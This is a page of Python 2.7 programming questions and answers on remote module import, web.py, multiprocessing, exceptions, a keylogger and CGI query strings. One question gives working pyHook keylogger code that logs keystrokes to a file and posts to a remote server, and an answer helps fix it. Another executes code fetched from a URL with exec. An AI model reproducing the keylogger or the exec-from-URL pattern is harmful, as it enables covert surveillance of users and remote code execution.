Importing *.py from url - python-2.7

I want to import some Python functions from a URL for security purposes.
I got a solution from here:
How can a Python module be imported from a URL?
It kind of works; I can run the first function (func1) fine, but when I try to run the second function (func2), Python says func2 is not defined. Why is that?
module.py on the web server:
def func1(string):
    data = string + "world"
    return data

def func2(string):
    data = string + "bar"
    return data
main.py on my PC:
import urllib

def import_py_from_url(URL):
    exec urllib.urlopen(URL).read() in globals()

import_py_from_url("http://somehost.com/module.py")

# try first function
str = "hello "
data = func1(str)
print (data)  # OUTPUT: hello world

# try second function
str = "foo "
data = func2(str)
print (data)  # OUTPUT: NameError: name 'func2' is not defined
Is it even possible to do what I am trying to achieve? There is not much info about it around.
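A minimal sketch, assuming the same placeholder URL as above, of loading the remote source into a dedicated module object instead of exec-ing into globals(); this is just an illustrative variant, not a confirmed fix:

import imp
import urllib

def load_module_from_url(name, url):
    source = urllib.urlopen(url).read()   # fetch the remote source once
    module = imp.new_module(name)         # create an empty module object
    exec source in module.__dict__        # run the source in that module's namespace
    return module

remote = load_module_from_url("remote_module", "http://somehost.com/module.py")
print remote.func1("hello ")  # hello world
print remote.func2("foo ")    # foo bar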

Related

web.py running main twice, ignoring changes

I have a simple web.py app that reads a config file and serves two URL paths. However, I get two strange behaviors. One, changes made to data in Main are not reflected in the results of GET. Two, Main appears to run twice.
The desired behavior is that modifying data in Main causes the methods to see the modified data, and that Main is not re-run.
Questions:

1. What is really happening here, that mydict is not modified in either GET?
2. Why am I getting some code running twice?
3. Simplest path to desired behavior (most important)
4. Pythonic path to desired behavior (least important)
From pbuck (Accepted Answer): the answer for 3) is to replace
app = web.application(urls, globals())
with:
app = web.application(urls, globals(), autoreload=False)
Same behavior with Python on Linux (CentOS 6, Python 2.6.6) and on a MacBook (brew Python 2.7.12).
When started I get:
$ python ./foo.py 8080
Initializing mydict
Modifying mydict
http://0.0.0.0:8080/
When queried with:
wget http://localhost:8080/node/first/foo
wget http://localhost:8080/node/second/bar
Which results in (notice a second "Initializing mydict"):
Initializing mydict
firstClass.GET called with clobber foo
firstClass.GET somevalue is something static
127.0.0.1:52480 - - [17/Feb/2017 17:30:42] "HTTP/1.1 GET /node/first/foo" - 200 OK
secondClass.GET called with clobber bar
secondClass.GET somevalue is something static
127.0.0.1:52486 - - [17/Feb/2017 17:30:47] "HTTP/1.1 GET /node/second/bar" - 200 OK
Code:
#!/usr/bin/python
import web

urls = (
    '/node/first/(.*)', 'firstClass',
    '/node/second/(.*)', 'secondClass'
)

# Initialize web server, start it later at "app.run()"
#app = web.application(urls, globals())
# Running web.application in Main or above does not change behavior

# Static initialize mydict
print "Initializing mydict"
mydict = {}
mydict['somevalue'] = "something static"

class firstClass:
    def GET(self, globarg):
        print "firstClass.GET called with clobber %s" % globarg
        print "firstClass.GET somevalue is %s" % mydict['somevalue']
        return mydict['somevalue']

class secondClass:
    def GET(self, globarg):
        print "secondClass.GET called with clobber %s" % globarg
        print "secondClass.GET somevalue is %s" % mydict['somevalue']
        return mydict['somevalue']

if __name__ == '__main__':
    app = web.application(urls, globals())
    # read configuration files for initializations here
    print "Modifying mydict"
    mydict['somevalue'] = "something dynamic"
    app.run()
Short answer: avoid using globals, as they don't do what you think they do, especially when you eventually deploy this under nginx/apache, where there will (likely) be multiple processes running.
Longer answer
Why am I getting some code running twice?
Code, global to app.py, is running twice because it runs once, as it normally does. The second time is within the web.application(urls, globals()) call. Really, that call to globals() sets up module loading / re-loading. Part of that is re-loading all modules (including app.py). If you set autoreload=False in the web.applications() call, it won't do that.
What is really happening here, that mydict is not modified in either GET?
mydict is getting set to 'something dynamic', but then being re-set to 'something static' on second load. Again, set autoreload=False and it will work as you expect.
Shortest path?
autoreload=False
Pythonic path?
.... well, I wonder why you have mydict['somevalue'] = 'something static' and mydict['somevalue'] = 'something dynamic' in your module this way: why not just set it once under '__main__'?
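A minimal sketch of that fix applied to a stripped-down, single-route version of the poster's app (same names as above); with autoreload=False the module-level initialization runs once, so the value set under __main__ is what the GET handler sees:

#!/usr/bin/python
import web

urls = ('/node/first/(.*)', 'firstClass')

mydict = {}
mydict['somevalue'] = "something static"

class firstClass:
    def GET(self, globarg):
        # with autoreload=False this sees the value set under __main__
        return mydict['somevalue']

if __name__ == '__main__':
    app = web.application(urls, globals(), autoreload=False)
    mydict['somevalue'] = "something dynamic"
    app.run()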

How to run two processes in parallel using the multiprocessing module in Python

My requirement is to capture, from the project server's log file, the logs for a particular HTTP request sent to the server. So I have written two functions and am trying to execute them in parallel using the multiprocessing module, but only one is getting executed, and I am not sure what is going wrong.
My two functions: run_remote_command uses the paramiko module to execute the tail command on the remote server (a Linux box) and redirect the output to a file, and send_request uses the requests module to make a POST request from my local system (a Windows laptop) to the server.
Code:
import multiprocessing as mp
import paramiko
import datetime
import requests

def run_remote_command():
    basename = "sampletrace"
    suffixname = datetime.datetime.now().strftime("%y%m%d_%H%M%S")
    filename = "_".join([basename, suffixname])
    print filename
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(hostname='x.x.x.x', username='xxxx', password='xxxx')
    except Exception as e:
        print "SSH Connecting to Host failed"
        print e
        ssh.close()
    print ssh
    tail = "tail -1cf /var/opt/logs/myprojectlogFile.txt >"
    cmdStr = tail + " " + filename
    result = ''
    try:
        stdin, stdout, stderr = ssh.exec_command(cmdStr)
        print "error:" + str(stderr.readlines())
        print stdout
        #logger.info("return output : response=%s" %(self.resp_result))
    except Exception as e:
        print 'Run remote command failed cmd'
        print e
    ssh.close()

def send_request():
    request_session = requests.Session()
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = "some data "
    URL = "http://X.X.X.X:xxxx/request"
    request_session.headers.update(headers)
    resp = request_session.post(URL, data=data)
    print resp.status_code
    print resp.request.headers
    print resp.text

def runInParallel(*fns):
    proc = []
    for fn in fns:
        p = mp.Process(target=fn)
        p.start()
        proc.append(p)
    for p in proc:
        p.join()

if __name__ == '__main__':
    runInParallel(run_remote_command, send_request)
Output: only the send_request function is getting executed. Even when I check the process list on the server, no tail process is getting created.
200
Edited the code per @Ilja's comment.
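For reference, a minimal sketch confirming that the runInParallel pattern from the question does start both processes; the two workers below are trivial stand-ins, not the original run_remote_command / send_request:

import multiprocessing as mp
import time

def worker_a():
    time.sleep(1)              # stand-in for the long-running tail
    print "worker_a finished"

def worker_b():
    print "worker_b finished"  # stand-in for the HTTP request

def runInParallel(*fns):
    procs = []
    for fn in fns:
        p = mp.Process(target=fn)
        p.start()
        procs.append(p)
    for p in procs:
        p.join()

if __name__ == '__main__':
    runInParallel(worker_a, worker_b)  # both lines should print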

Returning error string from a method in python

I was reading a similar question, Returning error string from a function in python. While experimenting to create something similar in an object-oriented way so I could learn a few more things, I got lost.
I am using Python 2.7 and I am a beginner at object-oriented programming.
I cannot figure out how to make it work.
Sample code checkArgumentInput.py:
#!/usr/bin/python
__author__ = 'author'

class Error(Exception):
    """Base class for exceptions in this module."""
    pass

class ArgumentValidationError(Error):
    pass

    def __init__(self, arguments):
        self.arguments = arguments

    def print_method(self, input_arguments):
        if len(input_arguments) != 3:
            raise ArgumentValidationError("Error on argument input!")
        else:
            self.arguments = input_arguments
            return self.arguments
And the main.py script:
#!/usr/bin/python
import sys
import checkArgumentInput

__author__ = 'author'

argsValidation = checkArgumentInput.ArgumentValidationError(sys.argv)

if __name__ == '__main__':
    try:
        result = argsValidation.validate_argument_input(sys.argv)
        print result
    except checkArgumentInput.ArgumentValidationError as exception:
        # handle exception here and get error message
        print exception.message
When I execute the main.py script it produces two blank lines, whether or not I provide any argument input.
So my question is: how do I make this work?
I know that there is a module that can do this work for me by checking argument input, argparse, but I want to implement something that I could also use in other cases (try, except).
Thank you in advance for the time and effort reading and replying to my question.
OK. So, sys.argv is usually indexed with brackets at the end of it, with a number between the brackets, like sys.argv[1]. It holds your command-line input; e.g., sys.argv[0] is the name of the file.
main.py 42
In this case main.py is sys.argv[0] and 42 is sys.argv[1].
You need to identify the string you are going to take from the command line.
I think that this is the problem.
For more info: https://docs.python.org/2/library/sys.html
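To illustrate the indexing, a tiny sketch assuming the script is invoked as python main.py 42:

import sys

print sys.argv        # ['main.py', '42']
print sys.argv[0]     # main.py
print sys.argv[1]     # 42 (always a string)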
I did some research and found this useful question/answer that helped me understand my error: Manually raising (throwing) an exception in Python.
I am posting the corrected, functional code below, just in case someone will benefit from it in the future.
Sample code checkArgumentInput.py:
#!/usr/bin/python
__author__ = 'author'

class ArgumentLookupError(LookupError):
    pass

    def __init__(self, *args):  # *args because I do not know the number of args (input from terminal)
        self.output = None
        self.argument_list = args

    def validate_argument_input(self, argument_input_list):
        if len(argument_input_list) != 3:
            raise ValueError('Error on argument input!')
        else:
            self.output = "Success"
            return self.output
The second part main.py:
#!/usr/bin/python
import sys
import checkArgumentInput

__author__ = 'author'

argsValidation = checkArgumentInput.ArgumentLookupError(sys.argv)

if __name__ == '__main__':
    try:
        result = argsValidation.validate_argument_input(sys.argv)
        print result
    except ValueError as exception:
        # handle exception here and get error message
        print exception.message
The code above prints Error on argument input! as expected, because I am violating the condition.
Anyway, thank you all for your time and effort; I hope this answer will help someone else in the future.
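For comparison, a minimal sketch of the pattern I would lean towards (my own variant, not the poster's exact code): keep the exception class empty and put the validation in a plain function, so the check and the error type stay separate.

#!/usr/bin/python
import sys

class ArgumentValidationError(Exception):
    pass

def validate_argument_input(args):
    # raise the custom exception instead of returning an error string
    if len(args) != 3:
        raise ArgumentValidationError("Error on argument input!")
    return "Success"

if __name__ == '__main__':
    try:
        print validate_argument_input(sys.argv)
    except ArgumentValidationError as exception:
        print exception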

Python keylogger: an integer is required

I am trying to make a keylogger that sends text to a web server. Using pyHook and httplib2, I was able to make them work separately. However, when I try to combine the two, I get the error:
An integer is required
I honestly have no idea what causes this. Both functions work by themselves, so why can't I combine them? Any suggestions?
Thanks!
import pyHook
import pythoncom
import time
from httplib2 import Http
from urllib import urlencode

h = Http()
log_file = "control.txt"
message = ""
f = open(log_file, "a")

def pressed_chars(event):
    if event.Ascii:
        global message
        char = chr(event.Ascii)
        if char == "q":
            f.close()
            exit()
        if event.Ascii == 13:
            f.write("\n")
            data = dict(cmd="openurl")
            testVar = h.request("http://www.**********/submit.php", "POST", urlencode(data))
            message = ""
        f.write(char)
        message = message + char
        print(message)

proc = pyHook.HookManager()
proc.KeyDown = pressed_chars
proc.HookKeyboard()
pythoncom.PumpMessages()
It seems you are not returning True in pressed_chars. Try adding the line return True and see if it works!
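A sketch of what that suggestion looks like in the handler; the body is elided, only the return value changes. pyHook uses the return value to decide whether to pass the key event on to other handlers.

def pressed_chars(event):
    if event.Ascii:
        # ... existing logging / HTTP code ...
        pass
    return True  # let pyHook pass the event on instead of swallowing it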

How do I access the URL's Query String in a Python CGI script?

I'm trying to access the query string in a Python script; in bash I'd access it using the ${QUERY_STRING} environment variable.
I've come across things like this: https://stackoverflow.com/a/2764822/32836, but this script, as run by Apache2:
#!/usr/bin/python
print self.request.query_string
prints nothing, and at the command line, the same produces this error:
$ ./testing.py
Traceback (most recent call last):
File "./testing.py", line 3, in <module>
print self.request.query_string
NameError: name 'self' is not defined
How do I read the query_string?
First of all, the 'self' name is only available inside a method that defines it as a parameter, typically on an object's class. It is used the same way 'this' is used in other OOP languages.
Now, the snippet of code you were trying to use was intended for Google App Engine, which you have not imported (nor installed, I presume). Since you are accustomed to using environment variables, here's what you can do:
#!/usr/bin/python
import os
print os.environ.get("QUERY_STRING", "No Query String in url")
However, I would advise you to use the cgi module instead. Read more about it here: http://docs.python.org/2/library/cgi.html
I'd just like to add an alternate method of accessing the QUERY_STRING value: if you're running a CGI script, you could simply do the following:
import os
print "content-type: text/html\n" # so we can print to the webpage
print os.environ['QUERY_STRING']
In my testing and understanding, this also works when there is no query string in the URL; you'd just get an empty string.
This is confirmed to be working on 2.7.6. View all environment variables like so:
#!/usr/bin/python
import os

print "Content-type: text/html\r\n\r\n"
print "<font size=+1>Environment</font><br>"
for param in os.environ.keys():
    print "<b>%20s</b>: %s<br>" % (param, os.environ[param])
This snippet of code was obtained from a TutorialsPoint tutorial on CGI Programming with Python.
Although, as zombie_raptor_jesus mentioned, it's probably better to use Python's CGI module, with FieldStorage to make things easier.
Again from the above tutorial:
# Import modules for CGI handling
import cgi, cgitb
# Create instance of FieldStorage
form = cgi.FieldStorage()
# Get data from fields
first_name = form.getvalue('first_name')
last_name = form.getvalue('last_name')
This will save the values from the query string first_name=Bobby&last_name=Ray.
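Putting that together, a minimal self-contained sketch of a CGI script using FieldStorage; the field names match the example query string above, and cgitb is only there to show tracebacks in the browser while testing.

#!/usr/bin/python
import cgi
import cgitb

cgitb.enable()  # show tracebacks in the browser while testing

form = cgi.FieldStorage()
first_name = form.getvalue('first_name', '')
last_name = form.getvalue('last_name', '')

print "Content-Type: text/html\n"
print "<p>Hello %s %s</p>" % (first_name, last_name)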
This is how I capture the (A) URL, (B) GET parameters, and (C) POST data from CGI in Python 3.
I am using these methods on a Windows Server running Python 3, using CGI via MIIS.
import sys, os, io

# CAPTURE URL
myDomainSelf = os.environ.get('SERVER_NAME')
myPathSelf = os.environ.get('PATH_INFO')
myURLSelf = myDomainSelf + myPathSelf

# CAPTURE GET DATA
myQuerySelf = os.environ.get('QUERY_STRING')

# CAPTURE POST DATA
myTotalBytesStr = os.environ.get('HTTP_CONTENT_LENGTH')
if (myTotalBytesStr == None):
    myJSONStr = '{"error": {"value": true, "message": "No (post) data received"}}'
else:
    myTotalBytes = int(os.environ.get('HTTP_CONTENT_LENGTH'))
    myPostDataRaw = io.open(sys.stdin.fileno(), "rb").read(myTotalBytes)
    myPostData = myPostDataRaw.decode("utf-8")

# Write RAW to FILE
mySpy = "myURLSelf: [" + str(myURLSelf) + "]\n"
mySpy = mySpy + "myQuerySelf: [" + str(myQuerySelf) + "]\n"
mySpy = mySpy + "myPostData: [" + str(myPostData) + "]\n"

# You need to define your own myPath here
myFilename = "spy.txt"
myFilePath = myPath + "\\" + myFilename
myFile = open(myFilePath, "w")
myFile.write(mySpy)
myFile.close()
=======================================================
Here are some other useful CGI environment vars:
AUTH_TYPE
CONTENT_LENGTH
CONTENT_TYPE
GATEWAY_INTERFACE
PATH_INFO
PATH_TRANSLATED
QUERY_STRING
REMOTE_ADDR
REMOTE_HOST
REMOTE_IDENT
REMOTE_USER
REQUEST_METHOD
SCRIPT_NAME
SERVER_NAME
SERVER_PORT
SERVER_PROTOCOL
SERVER_SOFTWARE
============================================
Hope this can help you.
import os

print('Content-Type: text/html\n\n<h1>Search query</h1>')

query_string = os.environ['QUERY_STRING']
SearchParams = [i.split('=') for i in query_string.split('&')]  # parse query string
# SearchParams is an array of type [['key','value'],['key','value']]
# for example 'k1=val1&data=test' will transform to
# [['k1','val1'],['data','test']]
for key, value in SearchParams:
    print('<b>' + key + '</b>: ' + value + '<br>\n')
With query_string = 'k1=val1&data=test'
it will echo:
<h1>Search query</h1>
<b>k1</b>: val1<br>
<b>data</b>: test<br>